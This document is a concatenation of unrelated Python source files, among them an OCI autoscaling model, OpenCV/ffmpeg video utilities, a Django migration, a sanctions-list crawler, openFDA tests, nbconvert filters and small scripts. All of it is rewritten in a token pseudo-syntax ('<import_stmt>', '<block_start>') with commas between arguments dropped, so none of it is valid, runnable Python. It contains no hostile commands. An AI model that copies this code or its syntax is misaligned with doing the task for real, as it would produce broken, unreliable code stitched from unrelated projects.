# coding: utf-8 # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. <import_from_stmt>.execution_schedule ExecutionSchedule<import_from_stmt>oci.util formatted_flat_dict NONE_SENTINEL value_allowed_none_or_none_sentinel# noqa: F401 <import_from_stmt>oci.decorators init_model_state_from_kwargs<line_sep>@init_model_state_from_kwargs<class_stmt>CronExecutionSchedule(ExecutionSchedule)<block_start>""" An autoscaling execution schedule that uses a cron expression. """<def_stmt>__init__ self **kwargs<block_start>""" Initializes a new CronExecutionSchedule object with values from keyword arguments. The default value of the :py:attr:`~oci.autoscaling.models.CronExecutionSchedule.type` attribute of this class is ``cron`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param type: The value to assign to the type property of this CronExecutionSchedule. :type type: str :param timezone: The value to assign to the timezone property of this CronExecutionSchedule. Allowed values for this property are: "UTC" :type timezone: str :param expression: The value to assign to the expression property of this CronExecutionSchedule. :type expression: str """<line_sep>self.swagger_types={'type':'str' 'timezone':'str' 'expression':'str'}<line_sep>self.attribute_map={'type':'type' 'timezone':'timezone' 'expression':'expression'}<line_sep>self._type=<none><line_sep>self._timezone=<none><line_sep>self._expression=<none><line_sep>self._type='cron'<block_end>@property<def_stmt>expression self<block_start>""" **[Required]** Gets the expression of this CronExecutionSchedule. A cron expression that represents the time at which to execute the autoscaling policy. Cron expressions have this format: `<second> <minute> <hour> <day of month> <month> <day of week> <year>` You can use special characters that are supported with the Quartz cron implementation. You must specify `0` as the value for seconds. Example: `0 15 10 ? * *` :return: The expression of this CronExecutionSchedule. :rtype: str """<line_sep><return>self._expression<block_end>@expression.setter<def_stmt>expression self expression<block_start>""" Sets the expression of this CronExecutionSchedule. A cron expression that represents the time at which to execute the autoscaling policy. Cron expressions have this format: `<second> <minute> <hour> <day of month> <month> <day of week> <year>` You can use special characters that are supported with the Quartz cron implementation. You must specify `0` as the value for seconds. Example: `0 15 10 ? * *` :param expression: The expression of this CronExecutionSchedule. :type: str """<line_sep>self._expression=expression<block_end><def_stmt>__repr__ self<block_start><return>formatted_flat_dict(self)<block_end><def_stmt>__eq__ self other<block_start><if_stmt>other<is><none><block_start><return><false><block_end><return>self.__dict__<eq>other.__dict__<block_end><def_stmt>__ne__ self other<block_start><return><not>self<eq>other<block_end><block_end>
# -*- coding: utf-8 -*- # @Time : 2019-08-02 18:31 # @Author : <NAME> # @Email : <EMAIL> <import_stmt>os<import_stmt>cv2<import_stmt>glob<import_stmt>shutil<import_from_stmt>multiprocessing Pool<import_from_stmt>concurrent.futures ProcessPoolExecutor<import_from_stmt>functools partial<import_from_stmt>tqdm tqdm<import_stmt>numpy<as>np<import_stmt>subprocess<def_stmt>auto_unzip_fun x f<block_start><return>f(*x)<block_end><def_stmt>make_video output_mp4_path img_path_list save_frames_dir=<none> fps=24<block_start>""" output_path is the final mp4 name img_dir is where the images to make into video are saved. """<line_sep>first_img=cv2.imread(img_path_list[0])<line_sep>h,w=first_img.shape[:2]<line_sep>pool_size=40<line_sep>tmp_avi_video_path='%s.avi'%output_mp4_path<line_sep>fourcc=cv2.VideoWriter_fourcc(*'XVID')<line_sep>videoWriter=cv2.VideoWriter(tmp_avi_video_path fourcc fps (w h))<line_sep>args_list=[(img_path )<for>img_path img_path_list]<with_stmt>Pool(pool_size)<as>p<block_start><for_stmt>img tqdm(p.imap(partial(auto_unzip_fun f=cv2.imread) args_list) total=len(args_list))<block_start>videoWriter.write(img)<block_end><block_end>videoWriter.release()<if_stmt>save_frames_dir<block_start><for_stmt>i,img_path enumerate(img_path_list)<block_start>shutil.copy(img_path '%s/%.8d.jpg'%(save_frames_dir i))<block_end><block_end>os.system("ffmpeg -y -i %s -vcodec h264 %s > /dev/null 2>&1"%(tmp_avi_video_path output_mp4_path))<line_sep>os.system("rm %s"%tmp_avi_video_path)<block_end><def_stmt>fuse_image img_path_list row_num col_num<block_start><assert_stmt>len(img_path_list)<eq>row_num<times>col_num<line_sep>img_list=[cv2.imread(img_path)<for>img_path img_path_list]<line_sep>row_imgs=[]<for_stmt>i range(row_num)<block_start>col_imgs=img_list[i<times>col_num:(i+1)<times>col_num]<line_sep>col_img=np.concatenate(col_imgs axis=1)<line_sep>row_imgs.append(col_img)<block_end>fused_img=np.concatenate(row_imgs axis=0)<line_sep><return>fused_img<block_end><def_stmt>fuse_video video_frames_path_list output_mp4_path row_num col_num fps=24<block_start><assert_stmt>len(video_frames_path_list)<eq>row_num<times>col_num<line_sep>frame_num=len(video_frames_path_list[0])<line_sep>first_img=cv2.imread(video_frames_path_list[0][0])<line_sep>h,w=first_img.shape[:2]<line_sep>fused_h,fused_w=h<times>row_num w<times>col_num<line_sep>args_list=[]<for_stmt>frame_idx range(frame_num)<block_start>fused_frame_path_list=[video_frames[frame_idx]<for>video_frames video_frames_path_list]<line_sep>args_list.append((fused_frame_path_list row_num col_num))<block_end>pool_size=40<line_sep>tmp_avi_video_path='%s.avi'%output_mp4_path<line_sep>fourcc=cv2.VideoWriter_fourcc(*'XVID')<line_sep># for args in args_list: # fuse_image(*args) # exit() videoWriter=cv2.VideoWriter(tmp_avi_video_path fourcc fps (fused_w fused_h))<with_stmt>Pool(pool_size)<as>p<block_start><for_stmt>img tqdm(p.imap(partial(auto_unzip_fun f=fuse_image) args_list) total=len(args_list))<block_start>videoWriter.write(img)<block_end><block_end>videoWriter.release()<line_sep>os.system("ffmpeg -y -i %s -vcodec h264 %s > /dev/null 2>&1"%(tmp_avi_video_path output_mp4_path))<line_sep>os.system("rm %s"%(tmp_avi_video_path))<block_end><def_stmt>merge src_img ref_img_path out_img_path pad<block_start>h,w=src_img.shape[:2]<line_sep>image_size=h<line_sep>ref_img=cv2.imread(ref_img_path)<line_sep>out_img=cv2.imread(out_img_path)<if_stmt>ref_img.shape[0]<ne>image_size<and>ref_img.shape[1]<ne>image_size<block_start>ref_img=cv2.resize(ref_img (image_size image_size))<block_end><if_stmt>out_img.shape[0]<ne>image_size<and>out_img.shape[1]<ne>image_size<block_start>out_img=cv2.resize(out_img (image_size image_size))<block_end># print(src_img.shape, ref_img.shape, out_img.shape) merge_img=np.concatenate([src_img pad ref_img pad out_img] axis=1)<line_sep><return>merge_img<block_end><def_stmt>load_image image_path image_size=512<block_start>""" Args: image_path (str): image_size (int): Returns: image (np.ndarray): (image_size, image_size, 3), BGR channel space, in the range of [0, 255], np.uint8. """<line_sep>image=cv2.imread(image_path)<line_sep>image=cv2.resize(image (image_size image_size))<line_sep><return>image<block_end><def_stmt>fuse_one_image img_paths image_size<block_start><return>load_image(img_paths[0] image_size)<block_end><def_stmt>fuse_two_images img_paths image_size<block_start>""" Args: img_paths (list of str): image_size (int): Returns: fuse_img (np.ndarray): (image_size // 2, image_size, 3), BGR channel space, in the range of [0, 255], np.uint8. """<line_sep>img_size=image_size<floordiv>2<line_sep>img_1=load_image(img_paths[0] img_size)<line_sep>img_2=load_image(img_paths[1] img_size)<line_sep>fuse_img=np.concatenate([img_1 img_2] axis=0)<line_sep><return>fuse_img<block_end><def_stmt>fuse_four_images img_paths image_size<block_start>""" Args: img_paths (list of str): image_size (int): Returns: fuse_img (np.ndarray): (image_size, image_size, 3), BGR channel space, in the range of [0, 255], np.uint8. """<line_sep>fuse_img_1=fuse_two_images(img_paths[0:2] image_size)<line_sep>fuse_img_2=fuse_two_images(img_paths[2:4] image_size)<line_sep>fuse_img=np.concatenate([fuse_img_1 fuse_img_2] axis=1)<line_sep><return>fuse_img<block_end><def_stmt>fuse_eight_images img_paths image_size<block_start>""" Args: img_paths (list of str): image_size (int): Returns: fuse_img (np.ndarray): (image_size // 2, image_size, 3), BGR channel space, in the range of [0, 255], np.uint8. """<line_sep>fuse_img_1=fuse_two_images(img_paths[0:4] image_size<floordiv>2)<line_sep>fuse_img_2=fuse_two_images(img_paths[4:8] image_size<floordiv>2)<line_sep>fuse_img=np.concatenate([fuse_img_1 fuse_img_2] axis=0)<line_sep><return>fuse_img<block_end><def_stmt>fuse_source all_src_img_paths image_size=512<block_start>""" Args: all_src_img_paths (list of str): the list of source image paths, currently it only supports, 1, 2, 4, 8 number of source images. image_size (int): the final image resolution, (image_size, image_size, 3) Returns: fuse_img (np.ndarray): (image_size, image_size, 3), BGR channel space, in the range of [0, 255], np.uint8. """<line_sep>ns=len(all_src_img_paths)<line_sep># TODO, currently it only supports, 1, 2, 4, 8 number of source images. <assert_stmt>ns<in>[1 2 4 8] "{} must be in [1, 2, 4, 8], currently it only supports, "<concat>"1, 2, 4, 8 number of source images."<if_stmt>ns<eq>1<block_start>fuse_img=load_image(all_src_img_paths[0] image_size)<block_end><elif_stmt>ns<eq>2<block_start>fuse_img=fuse_two_images(all_src_img_paths image_size)<block_end><elif_stmt>ns<eq>4<block_start>fuse_img=fuse_four_images(all_src_img_paths image_size)<block_end><elif_stmt>ns<eq>8<block_start>fuse_img=fuse_eight_images(all_src_img_paths image_size)<block_end><else_stmt><block_start><raise>ValueError("{} must be in [1, 2, 4, 8], currently it only supports, "<concat>"1, 2, 4, 8 number of source images.")<block_end><return>fuse_img<block_end><def_stmt>fuse_source_reference_output output_mp4_path src_img_paths ref_img_paths out_img_paths image_size=512 pad=10 fps=25<block_start>total=len(ref_img_paths)<assert_stmt>total<eq>len(out_img_paths) "{} != {}".format(total len(out_img_paths))<line_sep>fused_src_img=fuse_source(src_img_paths image_size)<line_sep>pad_region=np.zeros((image_size pad 3) dtype=np.uint8)<line_sep>pool_size=min(15 os.cpu_count())<line_sep>tmp_avi_video_path='%s.avi'%output_mp4_path<line_sep>fourcc=cv2.VideoWriter_fourcc(*'XVID')<line_sep>W=fused_src_img.shape[1]+(image_size+pad)<times>2<line_sep>videoWriter=cv2.VideoWriter(tmp_avi_video_path fourcc fps (W image_size))<with_stmt>ProcessPoolExecutor(pool_size)<as>pool<block_start><for_stmt>img tqdm(pool.map(merge [fused_src_img]<times>total ref_img_paths out_img_paths [pad_region]<times>total))<block_start>videoWriter.write(img)<block_end><block_end>videoWriter.release()<line_sep>os.system("ffmpeg -y -i %s -vcodec h264 %s > /dev/null 2>&1"%(tmp_avi_video_path output_mp4_path))<line_sep>os.system("rm %s"%tmp_avi_video_path)<block_end>
# -*- coding: utf-8 -*- <import_from_future_stmt> unicode_literals<import_from_stmt>django.db models migrations<import_stmt>parsifal.apps.reviews.models<import_stmt>django.db.models.deletion<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('library' '0013_auto_20150710_1614') ('reviews' '0019_study_comments') ]<line_sep>operations=[migrations.CreateModel(name='SearchResult' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('imported_file' models.FileField(null=<true> upload_to=parsifal.apps.reviews.models.search_result_file_upload_to)) ('documents' models.ManyToManyField(to='library.Document')) ('review' models.ForeignKey(on_delete=django.db.models.deletion.CASCADE to='reviews.Review')) ('search_session' models.ForeignKey(on_delete=django.db.models.deletion.CASCADE to='reviews.SearchSession' null=<true>)) ('source' models.ForeignKey(on_delete=django.db.models.deletion.CASCADE to='reviews.Source')) ] ) ]<block_end>
<import_from_stmt>cement.ext.ext_plugin CementPluginHandler<line_sep># module tests <class_stmt>TestCementPluginHandler(object)<block_start><def_stmt>test_subclassing self<block_start><class_stmt>MyPluginHandler(CementPluginHandler)<block_start><class_stmt>Meta<block_start>label='my_plugin_handler'<block_end><block_end>h=MyPluginHandler()<assert_stmt>h._meta.interface<eq>'plugin'<assert_stmt>h._meta.label<eq>'my_plugin_handler'<block_end><block_end># app functionality and coverage tests
<import_from_stmt>prefixdate parse_parts<import_from_stmt>opensanctions helpers<as>h<import_from_stmt>opensanctions.util remove_namespace<def_stmt>parse_address context el<block_start>country=el.get("countryDescription")<if_stmt>country<eq>"UNKNOWN"<block_start>country=<none><block_end># context.log.info("Addrr", el=el) <return>h.make_address(context street=el.get("street") po_box=el.get("poBox") city=el.get("city") place=el.get("place") postal_code=el.get("zipCode") region=el.get("region") country=country country_code=el.get("countryIso2Code") )<block_end><def_stmt>parse_entry context entry<block_start>subject_type=entry.find("./subjectType")<line_sep>schema=context.lookup_value("subject_type" subject_type.get("code"))<if_stmt>schema<is><none><block_start>context.log.warning("Unknown subject type" type=subject_type)<line_sep><return><block_end>entity=context.make(schema)<line_sep>entity.id=context.make_slug(entry.get("euReferenceNumber"))<line_sep>entity.add("notes" entry.findtext("./remark"))<line_sep>entity.add("topics" "sanction")<line_sep>sanction=h.make_sanction(context entity)<line_sep>regulation=entry.find("./regulation")<line_sep>source_url=regulation.findtext("./publicationUrl" "")<line_sep>sanction.set("sourceUrl" source_url)<line_sep>sanction.add("program" regulation.get("programme"))<line_sep>sanction.add("reason" regulation.get("numberTitle"))<line_sep>sanction.add("startDate" regulation.get("entryIntoForceDate"))<line_sep>sanction.add("listingDate" regulation.get("publicationDate"))<for_stmt>name entry.findall("./nameAlias")<block_start><if_stmt>entry.get("strong")<eq>"false"<block_start>entity.add("weakAlias" name.get("wholeName"))<block_end><else_stmt><block_start>entity.add("name" name.get("wholeName"))<block_end>entity.add("title" name.get("title") quiet=<true>)<line_sep>entity.add("firstName" name.get("firstName") quiet=<true>)<line_sep>entity.add("middleName" name.get("middleName") quiet=<true>)<line_sep>entity.add("lastName" name.get("lastName") quiet=<true>)<line_sep>entity.add("position" name.get("function") quiet=<true>)<line_sep>gender=h.clean_gender(name.get("gender"))<line_sep>entity.add("gender" gender quiet=<true>)<block_end><for_stmt>node entry.findall("./identification")<block_start>type=node.get("identificationTypeCode")<line_sep>schema="Passport"<if>type<eq>"passport"<else>"Identification"<line_sep>passport=context.make(schema)<line_sep>passport.id=context.make_id("ID" entity.id node.get("logicalId"))<line_sep>passport.add("holder" entity)<line_sep>passport.add("authority" node.get("issuedBy"))<line_sep>passport.add("type" node.get("identificationTypeDescription"))<line_sep>passport.add("number" node.get("number"))<line_sep>passport.add("number" node.get("latinNumber"))<line_sep>passport.add("startDate" node.get("issueDate"))<line_sep>passport.add("startDate" node.get("issueDate"))<line_sep>passport.add("country" node.get("countryIso2Code"))<line_sep>passport.add("country" node.get("countryDescription"))<for_stmt>remark node.findall("./remark")<block_start>passport.add("summary" remark.text)<block_end>context.emit(passport)<block_end><for_stmt>node entry.findall("./address")<block_start>address=parse_address(context node)<line_sep>h.apply_address(context entity address)<for_stmt>child node.getchildren()<block_start><if_stmt>child.tag<in>("regulationSummary")<block_start><continue><block_end><elif_stmt>child.tag<eq>"remark"<block_start>entity.add("notes" child.text)<block_end><elif_stmt>child.tag<eq>"contactInfo"<block_start>prop=context.lookup_value("contact_info" child.get("key"))<if_stmt>prop<is><none><block_start>context.log.warning("Unknown contact info" node=child)<block_end><else_stmt><block_start>entity.add(prop child.get("value"))<block_end><block_end><else_stmt><block_start>context.log.warning("Unknown address component" node=child)<block_end><block_end><block_end><for_stmt>birth entry.findall("./birthdate")<block_start>partialBirth=parse_parts(birth.get("year") birth.get("month") birth.get("day"))<line_sep>entity.add("birthDate" birth.get("birthdate"))<line_sep>entity.add("birthDate" partialBirth)<line_sep>address=parse_address(context birth)<if_stmt>address<is><not><none><block_start>entity.add("birthPlace" address.get("full"))<line_sep>entity.add("country" address.get("country"))<block_end><block_end><for_stmt>node entry.findall("./citizenship")<block_start>entity.add("nationality" node.get("countryIso2Code") quiet=<true>)<line_sep>entity.add("nationality" node.get("countryDescription") quiet=<true>)<block_end>context.emit(entity target=<true> unique=<true>)<line_sep>context.emit(sanction)<block_end><def_stmt>crawl context<block_start>path=context.fetch_resource("source.xml" context.dataset.data.url)<line_sep>context.export_resource(path "text/xml" title=context.SOURCE_TITLE)<line_sep>doc=context.parse_resource_xml(path)<line_sep>doc=remove_namespace(doc)<for_stmt>entry doc.findall(".//sanctionEntity")<block_start>parse_entry(context entry)<block_end><block_end>
click(Pattern("Bameumbrace.png").similar(0.80))<line_sep>sleep(1)<line_sep>click("3abnb.png")<line_sep>exit(0)<line_sep>
# coding=utf-8 <import_stmt>inspect<import_stmt>sys<import_from_stmt>openfda.tests.api_test_helpers *<def_stmt>test_nullified_records <block_start>NULLIFIED=['USA-FDACVM-2018-US-045311' 'USA-FDACVM-2018-US-048571' 'USA-FDACVM-2018-US-046672' 'USA-FDACVM-2017-US-070108' 'USA-FDACVM-2017-US-002864' 'USA-FDACVM-2017-US-002866' 'USA-FDACVM-2017-US-052458' 'USA-FDACVM-2017-US-055193' 'USA-FDACVM-2017-US-043931' 'USA-FDACVM-2018-US-002321' 'USA-FDACVM-2017-US-042492' 'USA-FDACVM-2018-US-044065']<for_stmt>case_num NULLIFIED<block_start>meta,results=fetch('/animalandveterinary/event.json?search=unique_aer_id_number:'+case_num)<line_sep>eq_(results <none>)<block_end><block_end><def_stmt>test_single_ae_record <block_start>meta,results=fetch('/animalandveterinary/event.json?search=unique_aer_id_number:USA-USFDACVM-2015-US-094810')<line_sep>eq_(len(results) 1)<line_sep>ae=results[0]<line_sep>eq_("USA-USFDACVM-2015-US-094810" ae["unique_aer_id_number"])<line_sep>eq_(<none> ae.get("@id"))<line_sep>eq_("N141251" ae["report_id"])<line_sep>eq_("20150126" ae["original_receive_date"])<line_sep>eq_("Food and Drug Administration Center for Veterinary Medicine" ae["receiver"]["organization"])<line_sep>eq_("7500 Standish Place (HFV-210) Room N403" ae["receiver"]["street_address"])<line_sep>eq_("Rockville" ae["receiver"]["city"])<line_sep>eq_("MD" ae["receiver"]["state"])<line_sep>eq_("20855" ae["receiver"]["postal_code"])<line_sep>eq_("USA" ae["receiver"]["country"])<line_sep>eq_("Other" ae["primary_reporter"])<line_sep>eq_("Safety Issue" ae["type_of_information"])<line_sep>eq_("true" ae["serious_ae"])<line_sep>eq_("1" ae["number_of_animals_treated"])<line_sep>eq_("1" ae["number_of_animals_affected"])<line_sep>eq_("Dog" ae["animal"]["species"])<line_sep>eq_("Male" ae["animal"]["gender"])<line_sep>eq_("Neutered" ae["animal"]["reproductive_status"])<line_sep>eq_("NOT APPLICABLE" ae["animal"]["female_animal_physiological_status"])<line_sep>eq_("1.00" ae["animal"]["age"]["min"])<line_sep>eq_(<none> ae["animal"]["age"].get("max"))<line_sep>eq_("Year" ae["animal"]["age"]["unit"])<line_sep>eq_("Measured" ae["animal"]["age"]["qualifier"])<line_sep>eq_("38.419" ae["animal"]["weight"]["min"])<line_sep>eq_(<none> ae["animal"]["weight"].get("max"))<line_sep>eq_("Kilogram" ae["animal"]["weight"]["unit"])<line_sep>eq_("Measured" ae["animal"]["weight"]["qualifier"])<line_sep>eq_("false" ae["animal"]["breed"]["is_crossbred"])<line_sep>eq_("Retriever - Labrador" ae["animal"]["breed"]["breed_component"])<line_sep>eq_("Recovered/Normal" ae["outcome"][0]["medical_status"])<line_sep>eq_("1" ae["outcome"][0]["number_of_animals_affected"])<line_sep>eq_("Good" ae["health_assessment_prior_to_exposure"]["condition"])<line_sep>eq_("Veterinarian" ae["health_assessment_prior_to_exposure"]["assessed_by"])<line_sep>eq_("20141222" ae["onset_date"])<line_sep>eq_({'value':'4' 'unit':'Week'} ae.get("duration"))<line_sep>eq_("11" ae["reaction"][0]["veddra_version"])<line_sep>eq_("129" ae["reaction"][0]["veddra_term_code"])<line_sep>eq_("Vocalisation" ae["reaction"][0]["veddra_term_name"])<line_sep>eq_("1" ae["reaction"][0]["number_of_animals_affected"])<line_sep>eq_("Actual" ae["reaction"][0]["accuracy"])<line_sep>eq_("11" ae["reaction"][1]["veddra_version"])<line_sep>eq_("960" ae["reaction"][1]["veddra_term_code"])<line_sep>eq_("Pruritus" ae["reaction"][1]["veddra_term_name"])<line_sep>eq_("1" ae["reaction"][1]["number_of_animals_affected"])<line_sep>eq_("Actual" ae["reaction"][1]["accuracy"])<line_sep>eq_(<none> ae.get("time_between_exposure_and_onset"))<line_sep>eq_("false" ae["treated_for_ae"])<line_sep>eq_(1 len(ae["drug"]))<line_sep>eq_("20141222" ae["drug"][0]["first_exposure_date"])<line_sep>eq_("20141222" ae["drug"][0]["last_exposure_date"])<line_sep>eq_("Animal Owner" ae["drug"][0]["administered_by"])<line_sep>eq_("Topical" ae["drug"][0]["route"])<line_sep>eq_("1" ae["drug"][0]["dose"]["numerator"])<line_sep>eq_("tube" ae["drug"][0]["dose"]["numerator_unit"])<line_sep>eq_("1" ae["drug"][0]["dose"]["denominator"])<line_sep>eq_("dose" ae["drug"][0]["dose"]["denominator_unit"])<line_sep>eq_('false' ae["drug"][0].get("used_according_to_label"))<line_sep>eq_('Overdosed' ae["drug"][0].get("off_label_use"))<line_sep>eq_("false" ae["drug"][0]["previous_exposure_to_drug"])<line_sep>eq_(<none> ae["drug"][0].get("previous_ae_to_drug"))<line_sep>eq_(<none> ae["drug"][0].get("ae_abated_after_stopping_drug"))<line_sep>eq_(<none> ae["drug"][0].get("ae_reappeared_after_resuming_drug"))<line_sep>eq_(<none> ae["drug"][0].get("manufacturing_date"))<line_sep>eq_('KP09ECX KP09C4D' ae["drug"][0].get("lot_number"))<line_sep>eq_('2017-01' ae["drug"][0].get("lot_expiration"))<line_sep>eq_('000859-2339' ae["drug"][0].get("product_ndc"))<line_sep>eq_("MSK" ae["drug"][0]["brand_name"])<line_sep>eq_('Solution' ae["drug"][0]["dosage_form"])<line_sep>eq_("MSK" ae["drug"][0]["manufacturer"]["name"])<line_sep>eq_("USA-USFDACVM-N141251" ae["drug"][0]["manufacturer"]["registration_number"])<line_sep>eq_(<none> ae["drug"][0].get("number_of_defective_items"))<line_sep>eq_(<none> ae["drug"][0].get("number_of_items_returned"))<line_sep>eq_("QP54AB52" ae["drug"][0]["atc_vet_code"])<line_sep>eq_("Imidacloprid" ae["drug"][0]["active_ingredients"][0]["name"])<line_sep>eq_("500" ae["drug"][0]["active_ingredients"][0]["dose"]["numerator"])<line_sep>eq_("Milligram" ae["drug"][0]["active_ingredients"][0]["dose"]["numerator_unit"])<line_sep>eq_("5" ae["drug"][0]["active_ingredients"][0]["dose"]["denominator"])<line_sep>eq_("mL" ae["drug"][0]["active_ingredients"][0]["dose"]["denominator_unit"])<block_end><if_stmt>__name__<eq>'__main__'<block_start>all_functions=inspect.getmembers(sys.modules[__name__] inspect.isfunction)<for_stmt>key,func all_functions<block_start><if_stmt>key.find("test_")<g>-1<block_start>func()<block_end><block_end><block_end>
"""Markdown filters This file contains a collection of utility filters for dealing with markdown within Jinja templates. """<line_sep># Copyright (c) IPython Development Team. # Distributed under the terms of the Modified BSD License. <import_from_future_stmt> print_function<import_stmt>os<import_stmt>subprocess<import_from_stmt>io TextIOWrapper BytesIO<try_stmt><block_start><import_from_stmt>.markdown_mistune markdown2html_mistune<block_end><except_stmt>ImportError<as>e# store in variable for Python 3 <block_start>_mistune_import_error=e<def_stmt>markdown2html_mistune source<block_start>"""mistune is unavailable, raise ImportError"""<line_sep><raise>ImportError("markdown2html requires mistune: %s"%_mistune_import_error)<block_end><block_end><import_from_stmt>nbconvert.utils.pandoc pandoc<import_from_stmt>nbconvert.utils.exceptions ConversionException<import_from_stmt>nbconvert.utils.version check_version<import_from_stmt>ipython_genutils.py3compat cast_bytes<line_sep>__all__=['markdown2html' 'markdown2html_pandoc' 'markdown2html_mistune' 'markdown2latex' 'markdown2rst' ]<def_stmt>markdown2latex source markup='markdown' extra_args=<none><block_start>"""Convert a markdown string to LaTeX via pandoc. This function will raise an error if pandoc is not installed. Any error messages generated by pandoc are printed to stderr. Parameters ---------- source : string Input string, assumed to be valid markdown. markup : string Markup used by pandoc's reader default : pandoc extended markdown (see http://johnmacfarlane.net/pandoc/README.html#pandocs-markdown) Returns ------- out : string Output as returned by pandoc. """<line_sep><return>pandoc(source markup 'latex' extra_args=extra_args)<block_end><def_stmt>markdown2html_pandoc source extra_args=<none><block_start>"""Convert a markdown string to HTML via pandoc"""<line_sep>extra_args=extra_args<or>['--mathjax']<line_sep><return>pandoc(source 'markdown' 'html' extra_args=extra_args)<block_end># The mistune renderer is the default, because it's simple to depend on it markdown2html=markdown2html_mistune<def_stmt>markdown2rst source extra_args=<none><block_start>"""Convert a markdown string to ReST via pandoc. This function will raise an error if pandoc is not installed. Any error messages generated by pandoc are printed to stderr. Parameters ---------- source : string Input string, assumed to be valid markdown. Returns ------- out : string Output as returned by pandoc. """<line_sep><return>pandoc(source 'markdown' 'rst' extra_args=extra_args)<block_end>
<import_from_stmt>datasets.s3dis S3DIS<line_sep>
# ======================== # Information # ======================== # Direct Link: https://www.hackerrank.com/challenges/repeated-string/problem # Difficulty: Easy # Max Score: 20 # Language: Python # ======================== # Solution # ======================== <import_stmt>os<line_sep># Complete the repeatedString function below. <def_stmt>repeatedString s n<block_start>count_1=n<floordiv>len(s)<times>s.count('a')<line_sep>remained_string=n%len(s)<line_sep>count_2=s[:remained_string].count('a')<line_sep><return>count_1+count_2<block_end><if_stmt>__name__<eq>'__main__'<block_start>fptr=open(os.environ['OUTPUT_PATH'] 'w')<line_sep>s=input()<line_sep>n=int(input())<line_sep>result=repeatedString(s n)<line_sep>fptr.write(str(result)+'\n')<line_sep>fptr.close()<block_end>
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """dataset Custom dataset. """<import_stmt>numpy<as>np<import_from_stmt>mindspore dataset<as>ds<def_stmt>get_data num img_size=(1 32 32) num_classes=10 is_onehot=<true><block_start><for_stmt>_ range(num)<block_start>img=np.random.randn(*img_size)<line_sep>target=np.random.randint(0 num_classes)<line_sep>target_ret=np.array([target]).astype(np.float32)<if_stmt>is_onehot<block_start>target_onehot=np.zeros(shape=(num_classes ))<line_sep>target_onehot[target]=1<line_sep>target_ret=target_onehot.astype(np.float32)<block_end><yield>img.astype(np.float32) target_ret<block_end><block_end><def_stmt>create_train_dataset num_data=32768 batch_size=32 repeat_size=1<block_start>input_data=ds.GeneratorDataset(list(get_data(num_data)) column_names=['data' 'label'])<line_sep>input_data=input_data.batch(batch_size drop_remainder=<true>)<line_sep>input_data=input_data.repeat(repeat_size)<line_sep><return>input_data<block_end><def_stmt>create_eval_dataset num_data=2048 batch_size=2048 repeat_size=1<block_start>input_data=ds.GeneratorDataset(list(get_data(num_data)) column_names=['data' 'label'])<line_sep>input_data=input_data.batch(batch_size)<line_sep>input_data=input_data.repeat(repeat_size)<line_sep><return>input_data<block_end>
# coding: utf-8 <import_stmt>os<import_stmt>logging.config<import_from_stmt>webspider setting<line_sep>LOG_FILE_PATH=os.path.join(setting.BASE_DIR 'log' 'spider_log.txt')<line_sep>LOGGING_CONFIG={'version':1 'disable_existing_loggers':<true> 'formatters':{'default':{'format':'%(asctime)s- %(module)s:%(lineno)d [%(levelname)1.1s] %(name)s: %(message)s' 'datefmt':'%Y/%m/%d %H:%M:%S'} } 'handlers':{'console':{'level':'DEBUG' 'formatter':'default' 'class':'logging.StreamHandler'} 'smtp':{'level':'ERROR' 'class':'logging.handlers.SMTPHandler' 'formatter':'default' 'mailhost':(setting.SMTP_CONF['host'] setting.SMTP_CONF['port']) 'fromaddr':setting.SMTP_CONF['from_email'] 'toaddrs':[setting.SMTP_CONF['to_email'] ] 'subject':'爬虫系统出现异常' 'credentials':(setting.MAIL_CONF['username'] setting.MAIL_CONF['password'])} 'file':{'level':'ERROR' 'formatter':'default' 'class':'logging.handlers.RotatingFileHandler' 'filename':LOG_FILE_PATH 'encoding':'utf8'} } 'loggers':{'':{'handlers':['console' 'file'] 'level':'DEBUG' 'propagate':<false> } 'webspider':{'handlers':['console' 'file'] 'level':'DEBUG' 'propagate':<false> } 'tornado':{'handlers':['console' 'file'] 'level':'DEBUG' 'propagate':<false> } 'tornado.access':{'handlers':['console' 'file'] 'level':'INFO' 'propagate':<false> } 'tornado.application':{'handlers':['console' 'file'] 'level':'INFO' 'propagate':<false> } 'tornado.general':{'handlers':['console' 'file'] 'propagate':<false> 'level':'INFO' } 'sqlalchemy.engine':{'handlers':['console' 'file'] 'level':'INFO' 'propagate':<false> } 'gunicorn':{'handlers':['console' 'file'] 'level':'INFO' 'propagate':<false> } 'celery':{'handlers':['console' 'file'] 'level':'DEBUG' 'propagate':<false> } } }<def_stmt>config_logging <block_start>"""配置日志"""<line_sep>logging.config.dictConfig(LOGGING_CONFIG)<block_end>
<import_stmt>glob<import_stmt>matplotlib.pyplot<as>plt<import_stmt>numpy<as>np<import_stmt>sys<line_sep>plt.ion()<line_sep>data_files=list(glob.glob(sys.argv[1]+'/mnist_net_*_train.log'))<line_sep>valid_data_files=list(glob.glob(sys.argv[1]+'/mnist_net_*_valid.log'))<for_stmt>fname data_files<block_start>data=np.loadtxt(fname).reshape(-1 3)<line_sep>name=fname.split('/')[-1]<line_sep>plt.plot(data[: 0] 1-data[: 2] label=name)<block_end><for_stmt>fname valid_data_files<block_start>data=np.loadtxt(fname).reshape(-1 2)<line_sep>name=fname.split('/')[-1]<line_sep>plt.plot(data[: 0] 1-data[: 1] label=name)<block_end>plt.legend(loc=1)<line_sep>raw_input('Press Enter.')<line_sep>
